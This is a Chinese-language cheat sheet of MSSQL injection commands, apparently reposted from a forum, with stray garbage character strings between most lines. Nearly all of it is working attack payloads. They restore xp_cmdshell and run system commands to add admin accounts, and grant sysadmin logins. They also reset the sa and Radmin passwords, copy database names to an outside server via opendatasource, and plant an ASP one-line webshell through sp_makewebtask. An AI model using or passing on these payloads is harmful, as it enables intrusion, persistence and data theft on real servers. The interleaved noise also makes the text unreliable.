阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
# U3 v& l* V* C3 s: S//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
: D/ {7 i* P" K0 ^; p9 J( u' j
4 K9 R" Z) j5 y; ]& ?
数字类型
  U' W6 F' p( v  p* I, G8 Kand char(124)%2Buser%2Bchar(124)=0
7 d- Y& m9 m. P" O
字符类型
3 i# b* H4 V1 ^+ Z' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
1 |) m0 h" I1 J' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
0 c: a7 j9 `3 U' and user>0 and ''='
& p: E0 z) l6 O0 ?+ }* V2 {
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
( M9 P$ B1 Y5 Q/ U) T3 I
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
* k* t; V3 r  X( M
' t' |. W* W7 a$ I) {$ M# {4 ]检测是否支持多行
& [% ?( @6 k4 j) Y;declare @d int;--

恢复 xp_cmdshell
, P# `; k$ \  H;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
: `* p# ]8 z0 D& G5 t2 c
. F/ p6 t. s2 ?: ?
& C7 B6 a4 r9 e: \. _select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
//      执行命令
//-----------------------
4 o1 c  ]" \, c首先开启沙盘模式：
& z& `4 @" e/ H& B$ H/ g* [! z* iexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

  R0 s5 A6 K4 F& i5 V然后利用jet.oledb执行系统命令
1 S7 `" ^8 b0 C2 e0 cselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

1 y( C. X6 Y: n7 w. ~7 b4 _执行命令
* p  I3 R! T; i( {;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
; O' F( }- G* U3 z
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

; u6 G* \- [7 l, A5 x判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
8 g2 q( {7 R5 ^  p7 ]* v( `
; ^- u9 I  Q- u7 V写注册表
  ]/ t  f4 ~$ m3 e) e4 vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ
  J2 z+ i  j( Y, {$ o
* j: ^! h4 N# S读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
5 |+ P1 Z8 J5 l5 i6 D
读取目录内容
2 M5 k  P6 f/ t7 Z5 xexec master..xp_dirtree 'c:\winnt\system32\',1,1
+ p0 r6 V: T9 a( O1 U% Q7 _( u6 {. G

) r! _/ i9 o; a1 u, m. P" l数据库备份
backup database pubs to disk = 'c:\123.bak'
; e* U. M1 ~% W" `0 S
! A! C. x' t5 @8 E+ w8 h- a! d$ y//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
) D+ ?: m' {' y. I, I. @


) p) D* ?" s) O) [( W, [- W更改sa口令方法：用sql综合利用工具连接后，执行命令：
/ O4 q! z+ ~! u" v: J0 o" N( K- Wexec sp_password NULL,'新密码','sa'
4 a+ w' k1 k' s
添加和删除一个SA权限的用户test：
# E5 {2 Z1 E' j" zexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
4 |9 z9 d1 y' `( R: y& L
删除扩展存储过过程xp_cmdshell的语句:
8 o4 |$ X) u3 f# Q0 k8 B& a" xexec sp_dropextendedproc 'xp_cmdshell'
! \5 E# c2 k3 A2 O4 f2 U
添加扩展存储过过程
' k& J; }7 f- |) P6 H$ T" oEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
) R5 ~7 ~" [2 P7 L* L# \) Y( V% rGRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。

2 h# V# I: z- Q2 ?exec master..xp_servicecontrol 'stop','schedule'
, P/ }# d4 G* ^7 Y7 @+ vexec master..xp_servicecontrol 'start','schedule'
4 b* s6 q6 B/ g8 _
dbo.xp_subdirs
- B2 |% h" ?3 x5 f6 {2 D
) ]/ _- F: N/ ]! k只列某个目录下的子目录。
" G" g" \/ z6 jxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

, h9 N" L( I0 }# U9 b' k2 [. j# idbo.xp_makecab
4 i! K/ I7 l( S" a, J7 d9 Z
- s' [' O8 r- {- {3 @2 N将目标多个档案压缩到某个目标档案之内。
# g: L' z8 ?* p% M) l所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
. C6 Z3 k: g% F7 @& ^$ h2 z'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

! D0 c- x7 |% D6 K( m( X  m" Bxp_terminate_process

/ _* S$ f. U; E: F9 m- Z停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
$ t$ H- Y7 C+ x  s6 C7 o
xp_terminate_process 2484

! L5 H& t- r1 C! j% k9 _- kxp_unpackcab

, G2 a8 n& r* M3 B0 f' o解开压缩档。

# C$ [5 u+ t9 T3 f9 e5 xxp_unpackcab 'c:\test.cab','c:\temp',1

; ]! M0 ?2 J0 N" j
8 A- h; `3 E# A% D% I某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
, E% {. m3 t- _2 SCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
  R; t: {+ Q9 Q* x* A
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
$ z6 {3 ?2 T% q7 [( _1 X1 m+ U

//在Master中创建表，看看权限怎样
9 \# Y) _4 @! a7 s+ f2 H. Z* W1 XCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

7 \9 N/ ~% C2 b3 C% t! n用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

/ S! t+ Z) p1 E* V( a4 U7 ^. x3 o//更新表内容
: n! `) r( T4 ZUpdate films SET kind = 'Dramatic' Where id = 123
6 P2 i  S2 S) C- \9 p" V/ m
/ ?3 s& P6 W3 n0 v# b5 Y//删除内容
delete from table_name where Stockid = 3